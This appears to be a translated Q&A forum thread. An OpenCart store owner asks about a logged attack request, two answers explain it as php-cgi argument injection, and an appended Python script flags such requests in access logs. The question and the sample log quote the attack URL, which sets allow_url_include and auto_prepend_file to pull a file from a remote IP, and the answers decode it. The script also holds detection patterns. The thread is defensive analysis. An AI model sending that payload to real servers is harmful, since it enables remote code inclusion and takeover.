PHP security failure

Viewed 492 times

3

I noticed unusual activity on my site (an OpenCart 2.0.2.0 e-commerce store).

This is the command they used:

http://www.meusite.com.br/? -d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp:/49.212.157.58/policy/r.txt

I don't know exactly what it is; it looks like it exploits a PHP flaw and installs a backdoor. I have the code that was injected (or not yet). Apparently he deleted the text from the server he was on, but I made a copy, so if someone wants to analyze it, let me know and I'll send it.

Now my question: how do I know whether his attack was successful, and how do I fix the problem?

  • This was the file he inserted: http://49.212.157.58/policy/r.txt. It seems to be a PHP function. Did you notice any unfamiliar file?

  • 4

    It is not a security flaw in PHP. It is merely a ridiculous attempt at "PHP injection". It happens thousands of times every day on every website. In your case, the parameters themselves do absolutely nothing.

  • @Danielomine this must be aimed at "old" PHP.

2 answers

3

This is an intrusion attempt that makes use of a PHP vulnerability in CGI mode, where php-cgi receives the query string as command-line arguments, allowing options to be passed via the URL.

By decoding the URL you can read the settings the attacker tried to set:

-d allow_url_include=On -d auto_prepend_file=http://49.212.157.58/policy/r.txt

The -d option sets a new value for an INI entry, and if it had succeeded, every PHP entry point would include (and run) the remote file r.txt, which opens up many possibilities for what the intruder could do.

2

Theoretically, judging from the code posted at the URL, they attempted an attack in which, relying on allow_url_include possibly being enabled in php.ini, they tried to run a command via the URL (I think some earlier versions of PHP had this flaw), which would cause the file policy/r.txt to be included automatically in every PHP script.

That is, if the attacker had succeeded, it would probably have been tragic for you.

Maybe what happened in this case was just an exploit attempt.

It is worth remembering that the fact that they tried to break into your system does not mean they succeeded.
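Both answers describe the same mechanism: a query string with no unencoded `=` is handed to php-cgi as command-line words, so `-d name=value` pairs become INI overrides. The script below is an added example (not code from either answer or from OpenCart) that applies that observation to access-log triage: it parses constructed Apache-style log lines, reproduces the request quoted in the question, and flags requests shaped like php-cgi argument injection, marking `allow_url_include` and `auto_prepend_file` overrides as high risk. The log lines, the client IPs and the `auto_append_file` entry in the high-risk set are my assumptions; the 49.212.157.58 address and the two directives come from the page.

```python
"""Flag php-cgi INI-override attempts in web server access logs (added example)."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format log lines. The first reproduces the
# request quoted in the question (space percent-encoded, as a browser sends
# it); the second is a normal OpenCart request; the third is a -d override
# of a low-risk directive, to show the severity split.
SAMPLE_LOG = """\
203.0.113.10 - - [10/May/2015:12:01:02 +0000] "GET /?%20-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp:/49.212.157.58/policy/r.txt HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.11 - - [10/May/2015:12:01:09 +0000] "GET /index.php?route=product/product&product_id=42 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
203.0.113.12 - - [10/May/2015:12:03:00 +0000] "GET /?-d+display_errors%3D1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

REQUEST_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# One "-d name=value" word pair in the decoded argv string.
INI_OVERRIDE = re.compile(r"(?:^|\s)-d\s*(?P<name>[A-Za-z_.]+)\s*=\s*(?P<value>\S*)")
# Directives that turn a reachable php-cgi into remote code inclusion.
# allow_url_include and auto_prepend_file are from the page; auto_append_file
# is added here as the symmetric directive.
HIGH_RISK_INI = {"allow_url_include", "auto_prepend_file", "auto_append_file"}


def cgi_argv_candidate(target: str) -> bool:
    """True if a CGI server would pass this query string to php-cgi as argv.

    The CGI spec says a query string with no unencoded '=' is split on '+'
    into command-line words, which is why the attacker encodes '=' as %3D.
    """
    query = urlsplit(target).query
    if not query or "=" in query:
        return False
    return unquote_plus(query).lstrip().startswith("-")


def find_ini_overrides(target: str):
    """Return [(ini_name, value), ...] for every -d pair in the decoded query."""
    decoded = unquote_plus(urlsplit(target).query)
    return [(m.group("name"), m.group("value")) for m in INI_OVERRIDE.finditer(decoded)]


def analyse_line(line: str):
    """Return a finding dict for a suspicious request, or None."""
    m = REQUEST_LINE.match(line)
    if not m:
        return None
    target = m.group("target")
    if not cgi_argv_candidate(target):
        return None
    overrides = find_ini_overrides(target)
    if not overrides:
        return None
    return {
        "client": m.group("client"),
        "target": target,
        "overrides": overrides,
        "high_risk": any(name in HIGH_RISK_INI for name, _ in overrides),
    }


def scan_log(text: str):
    """Scan a whole log body; keep only lines that produced a finding."""
    return [f for f in (analyse_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        level = "HIGH" if finding["high_risk"] else "info"
        print(f"[{level}] {finding['client']} {finding['target']}")
        for name, value in finding["overrides"]:
            print(f"        -d {name}={value}")
```

A hit only proves an attempt, which is the second answer's point: whether it worked depends on the server running PHP through php-cgi with the query string reaching argv, and that is not visible in the access log. The decoded `auto_prepend_file` value tells you which remote file to look for in any PHP output or in files left on disk.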
